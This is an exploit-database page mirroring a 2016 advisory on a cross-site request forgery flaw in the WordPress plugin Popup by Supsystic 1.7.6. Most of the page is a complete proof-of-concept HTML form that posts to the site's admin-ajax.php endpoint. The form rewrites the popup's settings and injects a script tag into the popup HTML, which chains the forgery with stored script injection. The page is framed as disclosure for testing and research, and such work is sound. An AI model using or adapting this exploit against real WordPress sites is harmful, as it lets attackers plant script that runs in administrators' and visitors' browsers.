WordPress Popup By Supsystic 1.7.6 Cross Site Request Forgery
CVE
Category
Price
Severity
CVE-2019-9166
CWE-352
$500
High
Author
Risk
Exploitation Type
Date
N/A
High
Remote
2017-03-03
CVSS vector description
Metric
Value
Metric Description
Value Description
Attack vector Network AV The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230). Attack Complexity Low AC The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system. Privileges Required None PR The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. Scope Unchanged S An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances. Confidentiality None C There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data. Integrity High I There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system. Availability None A There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017030016 Below is a copy:
WordPress Popup By Supsystic 1.7.6 Cross Site Request Forgery ------------------------------------------------------------------------
Popup by Supsystic WordPress plugin vulnerable to Cross-Site Request
Forgery
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-site Request Forgery vulnerablity exists in the Popup by
Supsystic WordPress Plugin. This vulnerablity allows attackers to add
and modify scripting code that will target authenticated WordPress
admins or visitors that see the popup generated by this plugin. Before
exploitation of this issue succeeds, and scripting code is therefore
injected, a victim WordPress admin to click a specially crafted link or
visit a malicious attacker-controlled webpage.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0013
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Popup by Supsystic WordPress
plugin version 1.7.6.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/popup_by_supsystic_wordpress_plugin_vulnerable_to_cross_site_request_forgery.html
This issue exists because Popup by Supsystic lacks protection against Cross-Site Request Forgery attacks. The following proof of concept code demonstrates this issue:
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="params[main][show_on]" value="page_load" />
<input type="hidden" name="params[main][show_on_page_load_delay]" value="" />
<input type="hidden" name="ppsCopyTextCode" value="[supsystic-show-popup id=100]" />
<input type="hidden" name="ppsCopyTextCode" value="onclick="ppsShowPopup(100); return false;"" />
<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
<input type="hidden" name="params[main][show_on_click_on_el_delay]" value="0" />
<input type="hidden" name="params[main][show_on_scroll_window_delay]" value="0" />
<input type="hidden" name="params[main][show_on_scroll_window_perc_scroll]" value="0" />
<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100" />
<input type="hidden" name="params[main][show_on_link_follow_delay]" value="0" />
<input type="hidden" name="ppsCopyTextCode" value="[supsystic-popup-content id=100]" />
<input type="hidden" name="params[main][close_on]" value="user_close" />
<input type="hidden" name="params[main][show_pages]" value="all" />
<input type="hidden" name="params[main][show_time_from]" value="12:00am" />
<input type="hidden" name="params[main][show_time_to]" value="12:00am" />
<input type="hidden" name="params[main][show_date_from]" value="" />
<input type="hidden" name="params[main][show_date_to]" value="" />
<input type="hidden" name="params[main][show_to]" value="everyone" />
<input type="hidden" name="params[main][show_to_first_time_visit_days]" value="30" />
<input type="hidden" name="params[main][show_to_until_make_action_days]" value="30" />
<input type="hidden" name="params[main][count_times_num]" value="1" />
<input type="hidden" name="params[main][count_times_mes]" value="day" />
<input type="hidden" name="params[main][hide_for_devices_show]" value="0" />
<input type="hidden" name="params[main][hide_for_post_types_show]" value="0" />
<input type="hidden" name="params[main][hide_for_ips_show]" value="0" />
<input type="hidden" name="params[main][hide_for_ips]" value="" />
<input type="hidden" name="params[main][hide_for_countries_show]" value="0" />
<input type="hidden" name="params[main][hide_for_languages_show]" value="0" />
<input type="hidden" name="params[main][hide_search_engines_show]" value="0" />
<input type="hidden" name="params[main][hide_preg_url_show]" value="0" />
<input type="hidden" name="params[main][hide_preg_url]" value="" />
<input type="hidden" name="params[main][hide_for_user_roles_show]" value="0" />
<input type="hidden" name="params[tpl][width]" value="400" />
<input type="hidden" name="params[tpl][width_measure]" value="px" />
<input type="hidden" name="params[tpl][bg_overlay_opacity]" value="0.5" />
<input type="hidden" name="params[tpl][bg_type_0]" value="color" />
<input type="hidden" name="params[tpl][bg_img_0]" value="" />
<input type="hidden" name="params[tpl][bg_color_0]" value="#8c7764" />
<input type="hidden" name="params[tpl][bg_type_1]" value="color" />
<input type="hidden" name="params[tpl][bg_img_1]" value="" />
<input type="hidden" name="params[tpl][bg_color_1]" value="#75362c" />
<input type="hidden" name="params[tpl][font_label]" value="default" />
<input type="hidden" name="params[tpl][label_font_color]" value="#ffffff" />
<input type="hidden" name="params[tpl][font_txt_0]" value="default" />
<input type="hidden" name="params[tpl][text_font_color_0]" value="#f9e6ce" />
<input type="hidden" name="params[tpl][font_footer]" value="default" />
<input type="hidden" name="params[tpl][footer_font_color]" value="#585858" />
<input type="hidden" name="params[tpl][responsive_mode]" value="def" />
<input type="hidden" name="params[tpl][reidrect_on_close]" value="" />
<input type="hidden" name="params[tpl][close_btn]" value="while_close" />
<input type="hidden" name="params[tpl][bullets]" value="lists_green" />
<input type="hidden" name="layered_style_promo" value="1" />
<input type="hidden" name="params[tpl][layered_pos]" value="" />
<input type="hidden" name="params[tpl][enb_label]" value="1" />
<input type="hidden" name="params[tpl][label]" value="SIGN UP<br> to our Newsletter!" />
<input type="hidden" name="params[tpl][enb_txt_0]" value="1" />
<input type="hidden" name="params_tpl_txt_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
<input type="hidden" name="params[tpl][foot_note]" value="We respect your privacy. Your information will not be shared with any third party and you can unsubscribe at any time " />
<input type="hidden" name="params[tpl][enb_sm_facebook]" value="1" />
<input type="hidden" name="params[tpl][enb_sm_googleplus]" value="1" />
<input type="hidden" name="params[tpl][enb_sm_twitter]" value="1" />
<input type="hidden" name="params[tpl][sm_design]" value="boxy" />
<input type="hidden" name="params[tpl][anim_key]" value="none" />
<input type="hidden" name="params[tpl][anim_duration]" value="" />
<input type="hidden" name="params[tpl][enb_subscribe]" value="1" />
<input type="hidden" name="params[tpl][sub_dest]" value="wordpress" />
<input type="hidden" name="params[tpl][sub_wp_create_user_role]" value="subscriber" />
<input type="hidden" name="params[tpl][sub_aweber_listname]" value="" />
<input type="hidden" name="params[tpl][sub_aweber_adtracking]" value="" />
<input type="hidden" name="params[tpl][sub_mailchimp_api_key]" value="" />
<input type="hidden" name="params[tpl][sub_mailchimp_groups_full]" value="" />
<input type="hidden" name="test_email" value="[email protected] " />
<input type="hidden" name="params[tpl][sub_fields][name][enb]" value="1" />
<input type="hidden" name="params[tpl][sub_fields][name][name]" value="name" />
<input type="hidden" name="params[tpl][sub_fields][name][html]" value="text" />
<input type="hidden" name="params[tpl][sub_fields][name][label]" value="Name" />
<input type="hidden" name="params[tpl][sub_fields][name][value]" value="" />
<input type="hidden" name="params[tpl][sub_fields][name][custom]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][name][mandatory]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][email][name]" value="email" />
<input type="hidden" name="params[tpl][sub_fields][email][html]" value="text" />
<input type="hidden" name="params[tpl][sub_fields][email][label]" value="E-Mail" />
<input type="hidden" name="params[tpl][sub_fields][email][value]" value="" />
<input type="hidden" name="params[tpl][sub_fields][email][custom]" value="0" />
<input type="hidden" name="params[tpl][sub_fields][email][mandatory]" value="1" />
<input type="hidden" name="params[tpl][sub_fields][email][enb]" value="1" />
<input type="hidden" name="params[tpl][sub_txt_confirm_sent]" value="Confirmation link was sent to your email address. Check your email!" />
<input type="hidden" name="params[tpl][sub_txt_success]" value="Thank you for subscribe!" />
<input type="hidden" name="params[tpl][sub_txt_invalid_email]" value="Empty or invalid email" />
<input type="hidden" name="params[tpl][sub_txt_exists_email]" value="Empty or invalid email" />
<input type="hidden" name="params[tpl][sub_redirect_url]" value="" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_subject]" value="Confirm subscription on [sitename]" />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_from]" value="[email protected] " />
<input type="hidden" name="params[tpl][sub_txt_confirm_mail_message]" value="You subscribed on site <a href="[siteurl]">[sitename]</a>. Follow <a href="[confirm_link]">this link</a> to complete your subscription. If you did not subscribe here - just ignore this message." />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_subject]" value="[sitename] Your username and password" />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_from]" value="[email protected] " />
<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_message]" value="Username: [user_login]<br />Password: [password]<br />[login_url]" />
<input type="hidden" name="params[tpl][sub_redirect_email_exists]" value="" />
<input type="hidden" name="params[tpl][sub_btn_label]" value="SIGN UP" />
<input type="hidden" name="params[tpl][sub_new_email]" value="admin&@mail.com" />
<input type="hidden" name="params[tpl][sub_new_subject]" value="New Subscriber on Summer of Pwnage" />
<input type="hidden" name="params[tpl][sub_new_message]" value="You have new subscriber on your site <a href="[siteurl]">[sitename]</a>, here us subscriber information:<br />[subscriber_data]" />
<input type="hidden" name="stat_from_txt" value="" />
<input type="hidden" name="stat_to_txt" value="" />
<input type="hidden" name="css" value="" />
<input type="hidden" name="html" value="<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Amatic+SC" />
<script>alert("xss")</script>
<div id="ppsPopupShell_[ID]" class="ppsPopupShell ppsPopupListsShell">
<a href="#" class="ppsPopupClose ppsPopupClose_[close_btn]"></a>
<div class="ppsInnerTblContent">
<div class="ppsPopupListsInner ppsPopupInner">
[if enb_label]
<div class="ppsPopupLabel ppsPopupListsLabel">[label]</div>
[endif]
<div style="clear: both;"></div>
[if enb_txt_0]
<div class="ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0">
[txt_0]
</div>
[endif]
[if enb_subscribe]
<div class="ppsSubscribeShell">
[sub_form_start]
[sub_fields_html]
<input type="submit" name="submit" value="[sub_btn_label]" />
[sub_form_end]
<div style="clear: both;"></div>
</div>
[endif]
<div style="clear: both;"></div>
<div class="ppsRightCol">
[if enb_sm]
<div style="clear: both;"></div>
<div class="ppsSm">
[sm_html]
</div>
[endif]
[if enb_foot_note]
<div class="ppsFootNote">
[foot_note]
</div>
[endif]
</div>
</div>
</div>
</div>
" />
<input type="hidden" name="params[opts_attrs][bg_number]" value="2" />
<input type="hidden" name="params[opts_attrs][txt_block_number]" value="1" />
<input type="hidden" name="mod" value="popup" />
<input type="hidden" name="action" value="save" />
<input type="hidden" name="id" value="100" />
<input type="hidden" name="params_tpl_txt_val_0" value="<p>Popup by Supsystic lets you easily create elegant overlapping windows with unlimited features. Pop-ups with Slider, Lightbox, Contact and Subscription forms and more</p>" />
<input type="hidden" name="pl" value="pps" />
<input type="hidden" name="reqType" value="ajax" />
<input type="submit"/>
</form>
</body>
</html>
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum